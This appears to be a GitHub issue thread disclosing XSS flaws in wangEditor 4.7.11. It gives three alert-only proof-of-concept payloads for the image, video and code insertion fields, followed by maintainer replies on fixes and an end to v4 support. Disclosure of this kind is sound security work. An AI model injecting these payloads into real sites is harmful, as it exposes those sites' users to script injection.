XSS vulnerability

[wahaha1573]

bug

XSS vulnerability

wangEditor version

V4.7.11

Can the official website reproduce the loopholes ？

Yes

Reproduction steps

1.Use the following code to build the environment or on the official demo website(https://codepen.io/xiaokyo-the-bold/pen/ZEpWByR)

<script type="text/javascript" src="https://unpkg.com/wangeditor/dist/wangEditor.min.js"></script>
<span class="col-lg-8" id="editor"></span>
<script type="text/javascript">
  const E = window.wangEditor
  const editor = new E('#editor')
  editor.create()
</script>

2.Access the location where the image is inserted
payload:
"><img src=1 onerror=alert(/xss/)>

Successfully trigger the XSS vulnerability popup

3.Access the location where the video was inserted
payload:

<iframe srcdoc="<script>alert(/xss/)</script>">

Successfully trigger the XSS vulnerability popup

4.Access the location where the code was inserted
payload:
</xmp></code></pre><img src=1 onerror=alert(/xss/)>

Successfully trigger the XSS vulnerability popup

[wangfupeng1988]

和 #3870 重复了。

[wahaha1573]

The function points are different (#3870 function point is at the image upload, and #3872 has 3 different function points), so I don't think this is a duplicate.

[Gavin-yh]

关于code 和 img 的xss, 已经修复发版。但是iframe的srcdoc属性是一个危险属性，插入的内容需要用户自己控制，插入必须是可信的内容。

[wangfupeng1988]

V5 已正式发布，v4 的 issue 将暂停处理。
该项目也是业余维护的，精力不够，还请体谅~

推荐尽快升级到 V5 版本。